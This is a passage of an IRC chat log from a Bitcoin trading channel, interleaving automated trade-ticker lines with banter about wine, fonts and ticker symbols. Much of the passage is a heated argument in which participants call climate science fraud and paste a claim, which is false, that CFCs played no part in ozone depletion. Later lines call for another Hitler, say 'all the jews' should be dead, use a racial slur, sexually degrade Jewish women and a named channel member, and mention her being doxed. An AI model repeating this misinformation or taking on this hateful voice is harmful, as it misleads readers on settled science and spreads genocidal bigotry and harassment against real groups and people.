assholes ? Sep 17 14:35:30 pankkake http://trilema.com/2010/viata-suge-cum-ne-omoram/ Sep 17 14:35:39 [BTCTC] [S] [TAT.ASICMINER] 144 @ 0.01873166 = 2.6974 BTC [-] {2} Sep 17 14:35:43 "life sucks, how do we kill ourselves". and it does include both considerations. Sep 17 14:35:44 me; my sister is a lawyer, so i should know Sep 17 14:35:53 that barbaric language again Sep 17 14:36:01 everything good happens in that language. Sep 17 14:36:09 well the advantage is that you won't get angry lawyers Sep 17 14:36:40 [BTCTC] [S] [LABCOIN] 29 @ 0.0028 = 0.0812 BTC [+] {2} Sep 17 14:36:42 isn't the whole point to lawyers to take the emotion out of the conflict? Sep 17 14:36:47 la vie est ailleurs & le cool c'est autre part! Sep 17 14:37:00 yeah not angry lawyers, angry people sending you their laywers Sep 17 14:37:27 I don't need to read the pics are enough :p Sep 17 14:37:39 how the fuck is the juice called in english anyweay Sep 17 14:37:51 i don't know for wine Sep 17 14:38:04 for beer it is called wort Sep 17 14:38:22 but my gf and i just call it juice :> Sep 17 14:39:19 :p Sep 17 14:39:38 must Sep 17 14:39:41 :) Sep 17 14:39:53 http://en.wikipedia.org/wiki/Must Sep 17 14:40:29 oh, the moût Sep 17 14:40:49 yes. Sep 17 14:40:54 wait, it's must in english ?! Sep 17 14:40:58 it's must in romanian too. Sep 17 14:40:58 tyrion70 saves the day Sep 17 14:40:59 yups Sep 17 14:41:04 hahah Sep 17 14:41:05 til. ty. Sep 17 14:41:16 it's most in Dutch.. so I had to look it up to :p Sep 17 14:41:21 and likely moust in old Frech Sep 17 14:41:42 well it does come from latin Sep 17 14:41:52 to which currently spoken romanian is pretty much the best extant reflection. Sep 17 14:42:36 anyway. i am drinking underage merlot! Sep 17 14:42:53 is she cute? Sep 17 14:44:14 sprightly more like it. Sep 17 14:44:48 [BTCTC] [FN] [DMS.PURCHASE] 200 @ 0.009365 = 1.873 BTC [+] Sep 17 14:44:59 well since we're doing this entire "let's teach mp vintnery terms in english as if the english speaking world even makes wine", Sep 17 14:45:13 how do you call the special large glass bottles you move must in ? Sep 17 14:45:22 california makes pretty good wines now Sep 17 14:45:25 australia too I think? Sep 17 14:45:47 demijohn! Sep 17 14:45:49 ha! ahaha. Sep 17 14:46:09 carboy? Sep 17 14:46:13 ye Sep 17 14:46:25 "Dame-jeanne" first time I hear the word Sep 17 14:46:49 :D Sep 17 14:47:02 damigeana in romania. Sep 17 14:47:06 we prefer the arabic in this part of the world. we luvz us some arabs Sep 17 14:48:45 oh. hmm.. i guess demijohn is persian Sep 17 14:50:52 https://bitcointalk.org/index.php?topic=125629.msg3172213#msg3172213 surprising Sep 17 14:50:54 [BTCTC] [S] [LABCOIN] 2 @ 0.002822 = 0.0056 BTC [+] Sep 17 14:50:56 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 17 14:51:55 [BTCTC] [S] [COGNITIVE] 1 @ 0.2 BTC [-] Sep 17 14:51:55 [BTCTC] [S] [TAT.VIRTUALMINE] 10 @ 0.00061 = 0.0061 BTC [-] Sep 17 14:51:55 [BTCTC] [S] [LABCOIN] 2 @ 0.002823 = 0.0056 BTC [+] Sep 17 14:52:46 random_cat weren't you making beer at some point ? Sep 17 14:52:56 [BTCTC] [S] [LABCOIN] 2 @ 0.002828 = 0.0057 BTC [+] Sep 17 14:53:24 yes. i haven't made any beer in a couple years. i left my eqipment in ohio, but now i am on the west coast Sep 17 14:53:37 equipments, even :) Sep 17 14:53:55 pankkake sorta like the monthly reports mpex has been mandating since i dunno, 2011 ? Sep 17 14:53:57 [BTCTC] [S] [LABCOIN] 2 @ 0.00283 = 0.0057 BTC [+] Sep 17 14:54:00 we could hook it up Sep 17 14:54:17 random_cat your equipments are dissapoint! Sep 17 14:54:45 s/wind/wine) Sep 17 14:54:53 sheesh... it's past bed time for sure Sep 17 14:56:47 mircea_popescu: which would exclude almost everything listed on btctc Sep 17 14:56:59 yeah well... Sep 17 14:57:55 think of the children Sep 17 14:58:01 [BTCTC] [S] [LABCOIN] 2 @ 0.002845 = 0.0057 BTC [+] Sep 17 15:00:03 [BTCTC] [S] [LABCOIN] 689 @ 0.00272788 = 1.8795 BTC [-] {35} Sep 17 15:01:04 [BTCTC] [S] [TAT.ASICMINER] 238 @ 0.0187418 = 4.4605 BTC [+] {4} Sep 17 15:01:04 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Sep 17 15:02:05 [BTCTC] [S] [LABCOIN] 2 @ 0.002804 = 0.0056 BTC [+] Sep 17 15:04:17 it would be nice to generate some eu style financial reports... just the basics.... income, balance, cash flow... on a nice lined sheet css... and a couple notes from the operator Sep 17 15:04:34 this shit's automated, right? :| Sep 17 15:05:33 (ok, maybe the notes/adjustments are not) Sep 17 15:05:37 ;;google accounting for the nonzero asset corporation Sep 17 15:05:38 Accounting for the nonzero asset corporation. The MPEx standard ...: ; fooling investors & fooling themselves - Rose Foundation for ...: ; Year end accounting reminders - IFRS June 2013 - PwC: (1 more message) Sep 17 15:06:27 Fooling%20Investors%20Report.pdf lol Sep 17 15:06:28 of course, the standard is the quarterly report.... so.... let the shareholders wait a quarter :> Sep 17 15:06:54 the stuff google dregs up Sep 17 15:07:01 random_cat that's the fiat standard. useless. Sep 17 15:07:10 [BTCTC] [S] [LABCOIN] 14 @ 0.00280571 = 0.0393 BTC [+] {2} Sep 17 15:07:30 fiat? what is this fiat? Sep 17 15:07:59 some italian cars Sep 17 15:08:27 fiat is this outmoded government-captive currency surogate. Sep 17 15:09:05 "Pls stop spellin’ tha name is caps tho." spelling the name is caps is an horrible French trait. I blame our bureaucracies Sep 17 15:12:16 [BTCTC] [S] [LABCOIN] 4 @ 0.002816 = 0.0113 BTC [+] Sep 17 15:12:49 ok, so the fooling investors was moderately entertaining Sep 17 15:13:17 [BTCTC] [S] [LABCOIN] 2 @ 0.002817 = 0.0056 BTC [+] Sep 17 15:13:20 http://dotsies.org/ dyslexics rejoice Sep 17 15:13:24 Dotsies Sep 17 15:13:48 i thought it was dyslexics untie Sep 17 15:15:19 " The latin alphabet (abc...) was created thousands of years ago, and is optimized for writing, not reading." that's quite the statement Sep 17 15:15:23 dyxlasics Sep 17 15:16:06 pankkake it's an old idea. borne principally by the observation that *it would have made sense* for it to be thus optimised. Sep 17 15:16:54 why nobody makes *both* easily readable and OCR-able font Sep 17 15:17:04 no more rogue QR codez Sep 17 15:17:21 [HAVELOCK] [S] [CBTC] 1200 @ 0.00047898 = 0.5748 BTC [-] {2} Sep 17 15:18:07 thx again, jurov. i really appreciate the trade Sep 17 15:18:22 [MPEX] [S] [S.MPOE] 10209 @ 0.0009189 = 9.3811 BTC [-] {3} Sep 17 15:18:57 jurov because these are largely contrary requirements i imagine/ Sep 17 15:19:30 not necessarily. they do know how visual cortex works by now Sep 17 15:19:31 aren't most fonts ocr-able these days? Sep 17 15:19:41 fonts are already heavily optimized for reading, that's pretty much most of the work that is spent on them, and on font rendering systems Sep 17 15:20:05 every little twist of the font is there for a reason Sep 17 15:20:23 yes, maybe just some dots for error correction algorithm can be added and we are there Sep 17 15:21:06 at least they solve the kerning issues with their font. but having the eye distinguis the letters by the dot vertical position? madness Sep 17 15:21:26 hmm http://www.myfonts.com/fonts/linotype/ocr-a/ Sep 17 15:21:27 haha Sep 17 15:25:09 ugly fucking font. Sep 17 15:25:25 here's an idea : if they can make cameras capable of reading passing car plates at night without failing, Sep 17 15:25:39 they'd better fix the fucking ocr rather than expect me to undertake the slightest inconvenience. Sep 17 15:26:30 also that 1973 thing TRIEd to be a trend and a standard at least three times and failed every time. Sep 17 15:26:30 [HAVELOCK] [S] [CBTC] 2001 @ 0.00041445 = 0.8293 BTC [-] {2} Sep 17 15:28:32 [BTCTC] [S] [LABCOIN] 13 @ 0.00279599 = 0.0363 BTC [-] {4} Sep 17 15:28:32 [HAVELOCK] [S] [CBTC] 188 @ 0.000479 = 0.0901 BTC [+] Sep 17 15:30:34 [HAVELOCK] [S] [AM1] 1 @ 2.0776 BTC [+] Sep 17 15:31:00 kakobrekla ahaha kickass. Sep 17 15:39:22 okay whats the tldr on assbot Sep 17 15:39:57 [s][fn]? I guess its aggregating trades too? Sep 17 15:40:14 you people and your newfangled changes Sep 17 15:40:35 in my day we changed NOTHING! Sep 17 15:41:17 yeah it aggregates trades. thankfully. Sep 17 15:41:41 wat s and fn mean Sep 17 15:41:41 gone are the days of jigs being up. Sep 17 15:41:51 fn ? Sep 17 15:41:55 how is babby formed Sep 17 15:41:58 the {4} is how many lines got aggregated. Sep 17 15:42:22 [HAVELOCK] [S] [AM1] 1 @ 2.0776 BTC [+] <- [S]? Sep 17 15:42:24 I see B, S, FN Sep 17 15:42:31 Buy, Sell, Fucking Noobs? Sep 17 15:42:45 [BTCTC] [S] [LABCOIN] 10 @ 0.002781 = 0.0278 BTC [-] Sep 17 15:42:55 something like that Sep 17 15:43:14 Fart Nocker Sep 17 15:43:41 Fillibert Nickletackler Sep 17 15:43:46 [MPEX] [S] [S.MPOE] 2200 @ 0.00091811 = 2.0198 BTC [-] Sep 17 15:43:46 it's some famous somalian. Sep 17 15:43:58 if price changes +20% add a P for Panic? Sep 17 15:44:38 i wish eritreans could get more cred Sep 17 15:45:55 reading that pdf from earlier... basically environment concern trolling. Sep 17 15:46:18 companies should asses in advance random arbitrary burden the socialist governments of the world might impose on them, because why not. Sep 17 15:46:39 quite equal with requiring jews to disclose to the camp guards the health risk of living in the camp. Sep 17 15:47:18 I wonder why no one has started some kind of governement-crap-insurance Sep 17 15:47:32 maybe because it's so hard to predict Sep 17 15:47:59 not enough usagis ? Sep 17 15:48:42 not enough real estate Sep 17 15:53:07 "Denial of emerging hazards such as global warming. Sep 17 15:53:07 " Sep 17 15:53:48 herp. i knew i was gonna run into that. refusal to submit to an attempt to create a larger market for the mafia interest through liberal application of bad science should be disclosed as a liability!!1 Sep 17 15:53:54 "denial" shouldn't be a word used by those who pretend to be scientific Sep 17 15:54:09 who also tend to use a lot of "believe" Sep 17 15:54:13 oh jesus Sep 17 15:54:32 we need bitcoin death squads, for when these types idiots start showing up here. Sep 17 15:54:41 mpoe-pr raging them on the forum only goes that far. Sep 17 15:54:55 yeah fuck science Sep 17 15:55:21 global warming aint real because al gore Sep 17 15:55:36 amirite? Sep 17 15:55:58 global warming ain't real for the same reason black reparations ain't real. Sep 17 15:55:58 [BTCTC] [S] [LABCOIN] 11268 @ 0.00295618 = 33.3102 BTC [+] {33} Sep 17 15:56:01 because nonsense. Sep 17 15:56:10 there are real concerning issues like not disclosing the data used Sep 17 15:56:11 come on man Sep 17 15:56:27 if the things can't be reproduced, it's not scientific Sep 17 15:56:47 the entire scientific community = nonsense Sep 17 15:56:47 dub dead serious. global warming is basically a bunch of politicos consipiring to attack legitimate scientists Sep 17 15:57:00 absolutely no "entire scientific community" Sep 17 15:57:02 except it isnt Sep 17 15:57:06 it's not /the entire scientific community/ Sep 17 15:57:13 but, I don't have this argument Sep 17 15:57:23 its not worth trying to talk sense to deniers Sep 17 15:57:29 :) Sep 17 15:57:31 hey, one day you get to work and discover the "entire dub workplace community" has decided dub now has to put condoms on ethernet cables. Sep 17 15:57:37 its too late for that Sep 17 15:57:50 that's EXACTLY what's going in. who the fuck asked the coffee gofer. Sep 17 15:58:35 even warmist admitted some of their affirmations were ludicrous. the hokey stick disappeared Sep 17 15:58:36 hockey Sep 17 15:58:39 yeah yeah, jesus saves too I herd Sep 17 15:58:58 it's kind of shocking to me someone can sit there and posture as if "science", on the basis of fifty years worth of geological measurements thart were extrapolated backwards to create a dataset that's then extrapolated forwards in time. Sep 17 15:59:07 what the fuck already, this is cognitive dissonance. Sep 17 15:59:38 lol 50 years of measurement Sep 17 15:59:43 you have conspiracy and fraud proven among the proponents, you have clear motive, you know its scientifically unsound, what's left really ? leftism ? Sep 17 15:59:47 yes dub. Sep 17 15:59:50 first I've heard that one Sep 17 16:00:10 what did you think it was, 50k years ? Sep 17 16:01:46 it goes longer than that, but the sources are bad Sep 17 16:01:55 and often the data is kept secret Sep 17 16:01:55 so then it... doesn't go longer than that. Sep 17 16:02:52 dub, s = share, b = bond, fn = fund, ft = future, o= option Sep 17 16:03:00 oh Sep 17 16:03:05 that's not very useful Sep 17 16:03:06 [HAVELOCK] [S] [XBOND] 3 @ 0.0012045 = 0.0036 BTC [+] Sep 17 16:03:07 [BTCTC] [S] [KENILWORTH] 1 @ 0.001649 BTC [-] Sep 17 16:03:51 earth is 4.5 bn years old. the average house exists for 45 years. making predictions of future earth temperatures based on 50 years sample is not unlike making prediction of house temperatures based on a number of measurements taken during the span of a half second. Sep 17 16:04:07 [HAVELOCK] [S] [XBOND] 3 @ 0.0012045 = 0.0036 BTC [+] Sep 17 16:04:30 you have to be one of the redditards who earnestly believe the world started with roosevelt to actually imagine this can be "science" in some manner. Sep 17 16:06:50 ask scientists Sep 17 16:07:02 i have. Sep 17 16:07:04 they ostly all agree Sep 17 16:07:07 mostly* Sep 17 16:07:10 [BTCTC] [S] [LABCOIN] 2 @ 0.00287 = 0.0057 BTC [-] Sep 17 16:07:15 fortunately i have access to actual scientists, as opposed to us govt stoogies. Sep 17 16:07:39 scientists whose funding depend on supporting global warming (or is it climate change now? cause climate never used to change) Sep 17 16:08:01 pankkake it was global warming up until it became obvious a global cooling is morel ikely on the short (ie, centuries) term Sep 17 16:08:11 [BTCTC] [S] [LABCOIN] 5 @ 0.00287 = 0.0144 BTC [-] Sep 17 16:08:16 at which point it morphed back into the nonspecific "bad things" the religious mind enjoys. Sep 17 16:08:23 well according to actual science we're supposed to enter a cooling period Sep 17 16:08:29 we will have hurricanes, floods and obvioujsly, it will rain frogs. Sep 17 16:08:35 well im fuckin cold right now Sep 17 16:08:42 and i shall be turned into a pillar of salt for doubting the word of "science" Sep 17 16:09:03 mircea_popescu: Do you disagree with: "The period for which reasonably reliable instrumental records of near-surface temperature exist with quasi-global coverage is generally considered to begin around 1850." ? Sep 17 16:09:06 yeah this is the great argument, its cold today therefor climate change isnt real Sep 17 16:09:12 TomServo yes. Sep 17 16:09:25 at issue is not the period where any trace whatsoever of some sort of measurement can be found. Sep 17 16:09:26 because I'm human, I need the fish to actually hit my face before its a fish Sep 17 16:09:45 at issue is the period during which systemtatic measurements were taken, which roughly starts with ww2 and the interest in aviation it spurred. Sep 17 16:09:53 "last years were hot therefore climate is going to be exponentially hotter" isn't good either Sep 17 16:10:18 dub note that the onus is on you to prove your putative fish is a fish, Sep 17 16:10:26 oooh found it again: http://surfacestations.org/ Sep 17 16:10:28 not on me to demonstrate some shapeless item is not a fish. Sep 17 16:10:42 its all proven Sep 17 16:10:52 we have carbon and we can measure it Sep 17 16:10:56 end. Sep 17 16:11:10 dude get out. even saying "carbon" is about as illiterate as it gets. Sep 17 16:11:21 we're discussing carbon DIOXIDE ? or what exactly ? Sep 17 16:11:28 further standard denial trumpting 'facts' can be ommited Sep 17 16:11:49 so jesus saves or what was it ? Sep 17 16:13:18 no, al gore Sep 17 16:13:21 fucking intellectually lazy slobs, thinking in terms of social proof and soundbytes. "carbon". herp. Sep 17 16:13:58 labcoatman says you should drink more fluoride. Sep 17 16:14:17 [MPEX] [S] [S.MPOE] 3323 @ 0.00091902 = 3.0539 BTC [+] {2} Sep 17 16:14:55 Well I don't see why you'd throw out all temperature records pre-ww2 because it wasn't 'systematic' enough? It's still data. Sep 17 16:15:16 TomServo im not throwing it out. i am merely observing you can't, from a scientific perspective, put too much weight on it. Sep 17 16:15:34 statistics is often used to lie, especially because correct sampling is so rarely understood by the common people. Sep 17 16:16:59 that objection aside, even accwepting a 150 year term, blind to the fact that people in 1850 had such bad instrumentation most ofg their other measurements in chemistry are significantly off etc, you're still barely up to a second and a half rather than half a second. Sep 17 16:17:39 who is arguing that human recordings of temperature have any bearing on the question Sep 17 16:17:59 acutally, forget it Sep 17 16:18:21 [BTCTC] [S] [COGNITIVE] 3 @ 0.1795 = 0.5385 BTC [-] Sep 17 16:18:22 I hate getting drawn into this, its like talking to god botherers Sep 17 16:19:22 [BTCTC] [S] [TAT.ASICMINER] 11 @ 0.01923 = 0.2115 BTC [+] {2} Sep 17 16:19:22 [BTCTC] [S] [LABCOIN] 32 @ 0.00295762 = 0.0946 BTC [+] {5} Sep 17 16:19:34 http://online.wsj.com/article/SB10001424052748704398304574598230426037244.html Sep 17 16:19:37 How to Manufacture a Climate Consensus - WSJ.com Sep 17 16:20:11 fine. take the other end. radative power from the sun ? 1.38 kW per sqyare meter. human energy consumption ? 0.033 W per square meter (all uses) Sep 17 16:20:23 [BTCTC] [S] [LABCOIN] 11 @ 0.00297727 = 0.0327 BTC [+] {2} Sep 17 16:20:43 also cows are more harmful than cars Sep 17 16:20:43 kill all the cows Sep 17 16:20:44 which of the two is more likely to be influencing energetic balance ? Sep 17 16:20:51 http://esr.ibiblio.org/?p=3974 Sep 17 16:20:57 this dinosaur at the offic ecatches me out all the time, 'IT WAS WARMER ON THE FIRST TUESDAY IN JUNE OF 1904, EXPLAIN THAT' followed closely by 'REPTILLIANS DID 911' Sep 17 16:21:00 Seven Eight Warning Signs of Junk Science Sep 17 16:21:08 dub why are you strawmaning it ? Sep 17 16:22:25 [BTCTC] [S] [LABCOIN] 10 @ 0.002948 = 0.0295 BTC [-] Sep 17 16:23:26 [BTCTC] [S] [TAT.ASICMINER] 7 @ 0.01923 = 0.1346 BTC [+] Sep 17 16:23:26 [MPEX] [S] [S.MPOE] 4900 @ 0.00091811 = 4.4987 BTC [-] Sep 17 16:24:15 pankkake not a bad read. remarkable how we don't hear anything about the ozone layer these days. Sep 17 16:24:30 we managed to save that, i take it ? Sep 17 16:25:03 lol, its not on TV, can't be real Sep 17 16:25:28 [BTCTC] [S] [LABCOIN] 2 @ 0.002891 = 0.0058 BTC [-] Sep 17 16:25:47 have you actually read the arguments behind global warming? Sep 17 16:26:03 I feel like it's always "but overwhelming consensus" Sep 17 16:26:04 arguments? Sep 17 16:26:09 there are no arguments Sep 17 16:26:15 dub is your estimation that we have managed to save the ozone layer through concerted effort of industry, regulators and consumers over the 80s and 90s ? Sep 17 16:26:29 [BTCTC] [S] [LABCOIN] 4 @ 0.002871 = 0.0115 BTC [-] {2} Sep 17 16:27:05 "Rhetoric that mixes science with the tropes of eschatological panic. When the argument for theory X slides from “theory X is supported by evidence” to “a terrible catastrophe looms over us if theory X is true, therefore we cannot risk disbelieving it”, you can be pretty sure that X is junk science. Consciously or unconsciously, advocates who say these sorts of things are trying to panic the herd into stampedin Sep 17 16:27:05 g rather than focusing on the quality of the evidence for theory X." Sep 17 16:27:11 my estimation is the ozone layer is still inconsistent as fuck Sep 17 16:27:18 this is pretty good. any sort of eschatology is outright and for that reason not science. Sep 17 16:27:30 [BTCTC] [S] [LABCOIN] 4 @ 0.002861 = 0.0114 BTC [-] {2} Sep 17 16:27:37 when the proponents start implying other people are the jesus freaks it's pretty far gone. Sep 17 16:27:45 I don't understand your "there are no arguments" Sep 17 16:27:57 its great that ESR put his bajo down long enough to oander to you guys though Sep 17 16:28:02 banjo* Sep 17 16:28:07 pander* Sep 17 16:28:08 I mean if you are going to have an opinion, you have to have it because you actually understand the stuff behind it Sep 17 16:28:12 fuck this keyboard Sep 17 16:28:31 [BTCTC] [S] [LABCOIN] 55 @ 0.00281018 = 0.1546 BTC [-] {3} Sep 17 16:28:31 [BTCTC] [S] [DMS.MINING] 200 @ 0.002499 = 0.4998 BTC [-] Sep 17 16:28:40 dub so basically... why are we not working on that then ? i recall the exact rethoric from the exact people twenty years ago about the ozone layer. Sep 17 16:28:46 my arugument is that arguing about the subject is a flat earth discussion Sep 17 16:28:53 if the problem isn't solved, and it's genuinely what it was presented to be, why have we moved on ? Sep 17 16:29:07 dub it is. the problem is you're the flat earth "scientist" Sep 17 16:29:11 sure Sep 17 16:29:16 kay. Sep 17 16:29:30 What do you suppose the {?} means? # of people affected by the trade? Sep 17 16:29:32 [HAVELOCK] [S] [LABCO] 12 @ 0.00249999 = 0.03 BTC [-] Sep 17 16:29:34 I know for experience as soon as teh mainstream media stop talking about somethign it ceases to exist Sep 17 16:29:36 lewicki trade count. Sep 17 16:29:40 lewicki loto numbers Sep 17 16:29:41 lewicki: average over one minute Sep 17 16:29:43 damn Sep 17 16:29:45 lol Sep 17 16:30:15 number of things averaged, more exactly Sep 17 16:30:17 well by that rationale the best solution to this entire global warming junk science rthing would be getting the media to stfu about it already Sep 17 16:30:26 and move on to aids epidemic or the nigger violence gene or w/e Sep 17 16:30:37 narcoterrorism Sep 17 16:30:49 you're making my point nicely Sep 17 16:31:10 i could certainly do with a different set of pretend-scientists reaching "consensus"es Sep 17 16:31:25 something new to laugh at. Sep 17 16:31:33 clearly the test for reality = 'average joe is blogging about it' Sep 17 16:31:34 [BTCTC] [S] [TAT.VIRTUALMINE] 1 @ 0.0006319 BTC [+] Sep 17 16:32:19 the thing is this : stupidity should be dispersed. when stupidity concentrates, intelligent people feel the vauge cramp of "we shoulsd maybe try help these idiots ?" Sep 17 16:32:35 [HAVELOCK] [S] [AM1] 2 @ 2 = 4 BTC [-] Sep 17 16:32:36 which is why i even bother pointing out the obvious re "global warming". Sep 17 16:32:36 [BTCTC] [S] [TAT.ASICMINER] 10 @ 0.0192 = 0.192 BTC [-] Sep 17 16:32:43 it's fucking ridiculous by now. Sep 17 16:32:47 by quoting ESR Sep 17 16:33:05 what's esr ? Sep 17 16:33:31 the hillbilly pankkake linked to Sep 17 16:33:33 o, pankkake's link ? Sep 17 16:33:36 [BTCTC] [S] [DMS.MINING] 600 @ 0.00243555 = 1.4613 BTC [-] {7} Sep 17 16:33:45 hm. is this some recognised party in the entire dispute ? Sep 17 16:33:56 you don't know who ESR is? Sep 17 16:33:59 he's a recognised crackpot Sep 17 16:34:16 global warming is the reason i never got a grade in agrometeorology Sep 17 16:34:17 i have no idea, i don't noprmally follow the nonsense. Sep 17 16:34:18 :\ Sep 17 16:34:28 anyway, i quoted the paragraph on its own merits, irrespective of author. Sep 17 16:34:37 [BTCTC] [FN] [DMS.SELLING] 300 @ 0.00704945 = 2.1148 BTC [+] {4} Sep 17 16:34:46 you see how useful that is pankkake! Sep 17 16:34:51 the fn all that jazz Sep 17 16:34:58 http://upload.wikimedia.org/wikipedia/commons/e/e2/Eric_S_Raymond_portrait.jpg science all over tat face Sep 17 16:35:09 kakobrekla options will be usefukl fo sho Sep 17 16:35:15 i didnt know dms.selling was a fund until now Sep 17 16:35:18 thank you assbot Sep 17 16:35:26 dub your objection just was that some random dork doesnt LOOK like a scientist ? Sep 17 16:35:32 yes Sep 17 16:35:38 [HAVELOCK] [S] [CBTC] 1388 @ 0.000479 = 0.6649 BTC [+] Sep 17 16:35:42 omfg he should be in asic mining. Sep 17 16:35:43 anyone should be bugged by "Refusal to make primary data sets available for inspection.", regardless of opinion on global warming Sep 17 16:35:54 anyway i can remove it as easily as i have added it, if we have a problem with it Sep 17 16:35:58 it's just the base of the scientific process Sep 17 16:36:01 pankkake inasmuch as that is emphatically not science. Sep 17 16:36:39 [BTCTC] [FN] [DMS.PURCHASE] 940 @ 0.009365 = 8.8031 BTC [+] Sep 17 16:36:50 dub o the cathedral/bazaar dude, i remember. Sep 17 16:38:24 I don't have much of an opinion myself on the subject, but I can see when things stink Sep 17 16:38:44 ESR has a genetic diformity or something Sep 17 16:38:52 If you don’t have a generative account of why your formulas and coupling constants look the way they do (a generative account which itself makes falsifiable predictions), you’re not doing science – you’re doing numerology. Sep 17 16:38:54 that's also solid. Sep 17 16:40:11 the scientific process is basically "here is what I found out, here is how, please prove me wrong" Sep 17 16:40:31 global warming: "here is what I found out, can't tell you how, you're a bad person if you disagree" Sep 17 16:40:44 [BTCTC] [S] [LABCOIN] 2 @ 0.002851 = 0.0057 BTC [+] Sep 17 16:41:26 we might as well be discussing nazis Sep 17 16:41:40 the world could do with another hitler Sep 17 16:42:04 dub here, have feynman saying substantially the same stuff http://www.lhup.edu/~DSIMANEK/cargocul.htm Sep 17 16:42:53 VanCleef a generation of kids that grew up being told they're special at home, at school and on tv moves on to be told it's "exceptional" by the politicians. Sep 17 16:43:19 hitler can not be possibly far behind, i've yet to see worhtless shits with delusions of grandeur simply bowing down into the dirt without a fight. Sep 17 16:44:38 pankkake: do 'things stink' because science or because our captains of politics and industry have found another 'free market' to toy with Sep 17 16:44:57 "You will never go wrong betting against Paul Ehrlich. " ahaha ok. Sep 17 16:45:01 as long as we get rid of the jews life will be good again Sep 17 16:45:10 sick of this old world Sep 17 16:45:20 VanCleef you ever did a jewish girl ? Sep 17 16:45:41 out of spite ya Sep 17 16:45:48 fucked the jew out of her Sep 17 16:45:49 [HAVELOCK] [S] [CBTC] 19 @ 0.00048 = 0.0091 BTC [+] Sep 17 16:45:58 can jewish girls swallow? Sep 17 16:46:14 pankkake only if you're not a pig. Sep 17 16:46:15 I know they can't eat half of the food existing Sep 17 16:46:17 because if science is wrong because the carbon market du jour is a scam.. Sep 17 16:46:22 I'm kind of a pig Sep 17 16:46:41 you're french right? Sep 17 16:46:43 dub no, they're unrelated. the science is wrong ; there is unscientific interest to make it stick anyway. Sep 17 16:46:49 [HAVELOCK] [S] [CBTC] 1540 @ 0.00048 = 0.7392 BTC [+] Sep 17 16:47:00 yes Sep 17 16:47:20 mircea_popescu: speaking of straw men Sep 17 16:47:40 its a lie because CONSPIRACY Sep 17 16:47:53 worked for the NSA all these years I guess Sep 17 16:48:00 no, it's a lie because stupidity. it is being promoted because money. Sep 17 16:48:22 it doesn't need to be a conspiracy (see cargo cult science: not a conspiracy) Sep 17 16:48:29 "No self-respecting scientist would ever utter a phrase like “the science is settled” or try to demonize dissenters." << this is kinda lulzy, seeing how i seem to recall 1900s physics being "A settled field" Sep 17 16:51:28 "As soon as AGW mutated to Anthropogenic Climate Change the whole show should have been laughed off the stage and all the players terminated (tenured or not)." < now this is the case. Sep 17 16:51:29 is mp-pr jewish? cause i would like to bang that jewish ass Sep 17 16:51:53 i don't recall any tenured professor being canned for not being competent. apparently the only way to get offed is fucking a student or something. Sep 17 16:52:03 VanCleef you'll have to ask her Sep 17 16:52:21 whats her fb? Sep 17 16:52:55 [HAVELOCK] [B] [TAT-XBOND] 1 @ 0.00120497 BTC Sep 17 16:53:36 also ask her. Sep 17 16:53:44 VanCleef: do the research. she has a blog under her true name Sep 17 16:54:02 i'm kidding, i dont care Sep 17 16:54:08 just want all the jews dead Sep 17 16:54:19 so we can have a good life Sep 17 16:54:19 it's funny nayway how inaba doxed her Sep 17 16:54:23 *anyway Sep 17 16:54:39 he did ? Sep 17 16:54:57 [HAVELOCK] [B] [TAT-XBOND] 102 @ 0.00120497 = 0.1229 BTC {3} Sep 17 16:55:19 !ticker h tat-xbond Sep 17 16:55:22 I prepared your canoe with cedar boughs. Sep 17 16:55:28 !ticker h xbond Sep 17 16:55:33 [HAVELOCK:XBOND] 1D: 0.00116600 / 0.0011986 / 0.00124049 (34650 shares, 41.53153308 BTC), 7D: 0.00110000 / 0.00118128 / 0.00124049 (122106 shares, 144.24078778 BTC), 30D: 0.00100000 / 0.0011281 / 0.00142350 (427885 shares, 482.69603608 BTC) Sep 17 16:55:40 !ticker h TAT-XBOND Sep 17 16:55:43 I haven't understood a single word you've said since I met you, not one single word. Sep 17 16:55:58 [HAVELOCK] [S] [CBTC] 10000 @ 0.00049537 = 4.9537 BTC [+] {6} Sep 17 16:57:07 !ticker h "TAT-XBOND" Sep 17 16:57:10 Your actions are useless. Sep 17 16:57:13 odd. Sep 17 16:57:24 was going to add the issuer field to the symbol Sep 17 16:57:30 but realized that would screw up historical data on assbot Sep 17 16:57:36 i've put it back Sep 17 16:57:43 (we keep issuer separate from the symbol itself on our side) Sep 17 16:57:59 use dots rather than lines anyway, and postfix rather than prefix Sep 17 16:58:16 mircea_popescu: https://bitcointalk.org/index.php?topic=129566.msg1401872#msg1401872 Sep 17 16:58:20 well our original plan was: ISSUER.SYMBOL.TYPE Sep 17 16:58:33 as a "display" version of the symbol Sep 17 16:58:39 he even thought she stole the face :) Sep 17 16:58:40 but the symbol itself would still just be the SYMBOL Sep 17 16:58:53 jurov o i c Sep 17 16:59:32 her avatar looks like a 3D rendering to me Sep 17 16:59:37 maybe the lightning Sep 17 16:59:44 that good huh Sep 17 17:00:03 [HAVELOCK] [B] [XBOND] 1 @ 0.00120498 BTC [+] Sep 17 17:00:59 a real nose can't be that sexy Sep 17 17:01:17 no, her nose actually is that sexy. Sep 17 17:01:22 :) Sep 17 17:01:28 course i suspect it's a frenchie thing. Sep 17 17:09:12 [BTCTC] [FN] [DMS.SELLING] 20 @ 0.007049 = 0.141 BTC [-] Sep 17 17:10:05 since it was mentioned, in case kids at home are using this to supplant their government-funded-therefore-absent education : Sep 17 17:10:07 The “ozone hole” is a naturally occurring result of atmospheric dynamics over Antarctica. Mainly the result of lack of sunlight in winter (remember ozone is made from O2 by UV light). The reason it was worse and has gotten smaller is that the scare was during the eruption of an antarctic volcano that was blasting enormous amounts of chlorine into the upper atmosphere. CFCs had nothing to do with it, being so stable Sep 17 17:10:07 and dense that little, if any, ever made it into the upper atmosphere. In fact, chlorides from wind-driven salt spray are a far larger constituent of atmospheric chlorine than CFCs ever were. Also, over the US where much of the CFCs were being released the amount of UV reaching the ground was decreasing during the same period (as the “ozone hole” was being fear-mongered). Sep 17 17:10:13 [MPEX] [S] [S.MPOE] 11800 @ 0.00091763 = 10.828 BTC [-] {2} Sep 17 17:10:13 [BTCTC] [S] [TAT.ASICMINER] 1 @ 0.01929 BTC [+] Sep 17 17:11:22 nevertheless, it got 1. everyone to buy a new set of fridges and acs, narrowly avoiding a depression and 2) rube countries that were just edging itno the tehcnology to compete were knocked back off the block. Sep 17 17:11:46 same thing being done with 